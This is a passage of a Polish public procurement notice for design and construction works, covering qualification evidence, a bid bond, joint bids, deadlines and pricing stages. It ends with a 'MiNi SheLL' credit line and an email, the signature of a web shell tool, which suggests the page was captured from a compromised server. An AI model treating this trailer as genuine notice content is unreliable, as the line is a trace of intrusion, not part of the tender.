dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2023 r. poz. 334).<br/>Zamawiający dopuszcza łączenie powyższych funkcji pod warunkiem posiadania przez osobę kwalifikacji odpowiadających wymaganiom dla każdej z wymienionych funkcji. Wykazanie się takimi, połączonymi uprawnieniami przez jedną, ta samą osobę, spełnia powyższe warunki.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do<br/>realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) W<br/>celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 22.1. SWZ:<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty – Załącznik nr 3 do SWZ.<br/>Uwaga!<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami,<br/>wykaz o którym mowa powyżej dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2) W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 22.2. SWZ:<br/>wykaz osób (zgodny z załącznikiem nr 4 do SWZ) skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami<br/>na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Sposób i forma przekazania oświadczeń i dokumentów został określony w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 roku, w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. 2020 poz. 2452).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W przypadku, gdy Wykonawca oferuje rozwiązania nieodpowiadające wprost normom referencyjnym opisanym w opisie<br/>przedmiotu zamówienia z załącznikami (załącznik nr 7 do SWZ) lub w załącznikach do projektowanych postanowień umowy (załącznik nr 2<br/>do SWZ), Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>Zamawiający wymaga udowodnienia w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o<br/>których mowa w art. 104-107 ustawy PZP, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania<br/>określone w ww. dokumentach.<br/>Na podstawie art. 107 ustawy PZP przedmiotowe środki dowodowe podlegają uzupełnieniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zgodnie z pkt. 20 SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w<br/>kwocie: 30 000 zł (słownie złotych: trzydzieści tysięcy 00/100).<br/>Wadium musi obejmować pełen okres związania ofertą.<br/>Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp.<br/>Szczegółowe informacje dotyczące wadium znajdują się w pkt. 26 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia na zasadach określonych w art. 58, art. 59 oraz art. 117<br/>ustawy Pzp. W takim przypadku wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie<br/>przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z<br/>pełnomocnikiem. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, do oferty należy załączyć:<br/>a) Oświadczenie z art. 117 ust. 4 ustawy Pzp (załącznik nr 5 do SWZ). Oświadczenie składane jest pod rygorem<br/>nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym.<br/>b) Oświadczenie o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu – Załącznik nr 1 do<br/>SWZ, składa każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia - Oświadczenie składane jest<br/>pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem<br/>osobistym.<br/>Oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>c) Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty.<br/>Pozostałe wymagania określono w SWZ i załącznikach. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający informuje, że zmiany umowy zostały przewidziane w projektowanych postanowieniach umowy, w<br/>szczególności w paragrafie 15 załączniku nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-05 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-05 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> PRZESŁANKI WYKLUCZENIA<br/>- Zamawiający wykluczy z postępowania wykonawców, wobec których zachodzą podstawy wykluczenia, o których mowa w<br/>art. 108 ust. 1 ustawy Pzp oraz z art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2024 r. poz.<br/>507 ze zm.).<br/>INFORMACJE DOTYCZĄCE CENY<br/>- Wykonawca w formularzu ofertowym (zdefiniowanym w systemie przez Zamawiającego) określi maksymalną cenę<br/>ofertową brutto (z należnym podatkiem od towarów i usług (VAT) za wykonanie całego przedmiotu zamówienia a w tym:<br/>1) cenę ryczałtową brutto za wykonanie zamówienia podstawowego (tj. za Etap I i Etap II)<br/>w tym:<br/>a) cenę ryczałtową brutto za wykonanie dokumentacji projektowej (Etap I),<br/><br/>UWAGA:<br/><br/>wartość wynagrodzenia za Etap I (wykonanie dokumentacji projektowej), nie może przekroczyć 3 % całkowitego ryczałtowego wynagrodzenia brutto za wykonanie:<br/>•	Etapu II tj. robót budowlanych i nadzoru autorskiego i <br/>•	Etapu III tj. robót budowlanych stanowiących prawo opcji), <br/><br/><br/>b) cenę ryczałtową brutto za wykonanie robót budowlanych oraz pełnienie nadzoru autorskiego (Etap II);<br/>oraz<br/>2) cenę ryczałtową brutto za wykonanie zamówienia stanowiącego prawo opcji (Etap III)<br/>INFORMACJE O PRAWIE OPCJI<br/>W ramach przedmiotowego zamówienia Zamawiający uprawniony jest do skorzystania z prawa opcji na zasadach<br/>opisanych w SWZ, w opisie przedmiotu zamówienia stanowiącym załącznik nr 7 do SWZ oraz w projektowanych<br/>postanowieniach umowy – załącznik nr 2 do SWZ.<br/>INFORMACJE O TERMINIE REALIZACJI<br/>Termin realizacji zamówienia – nie później niż 14 miesięcy od dnia zawarcia Umowy, w tym:<br/><br/>• w terminie 5 miesięcy od dnia zawarcia Umowy, jednak nie później niż do 10 grudnia 2024 r. - wykonanie dokumentacji projektowej, o której mowa w § 1 ust. 3 pkt 1 projektowanych postanowień umowy;<br/>• w terminie nie później niż 14 miesięcy od dnia zawarcia umowy wykonanie robót budowlanych, o których mowa w § 1 ust.<br/>3 pkt 2 projektowanych postanowień umowy;<br/>• w terminie od uzyskania pozwolenia na budowę do zakończenia robót budowlanych - pełnienie nadzoru autorskiego w<br/>trakcie realizacji robót budowlanych<br/>• termin wykonania zamówienia objętego prawem opcji nie może być dłuższy niż termin wykonania przedmiotu zamówienia<br/>w zakresie podstawowym, określony w § 2 ust. 1 pkt 2 projektowanych postanowień umowy (tj. nie później niż 14 miesięcy<br/>od dnia zawarcia umowy) z zastrzeżeniem, że Zamawiający jest uprawniony do skorzystania z prawa opcji w okresie do<br/>ośmiu miesięcy, licząc od dnia zawarcia umowy.<br/>Szczegółowe informacje dot. ww. zostały określone w: SWZ, projektowanych postanowieniach umowy - załącznik nr 2 do<br/>SWZ oraz Opisie Przedmiotu Zamówienia -załącznik nr 7 do SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com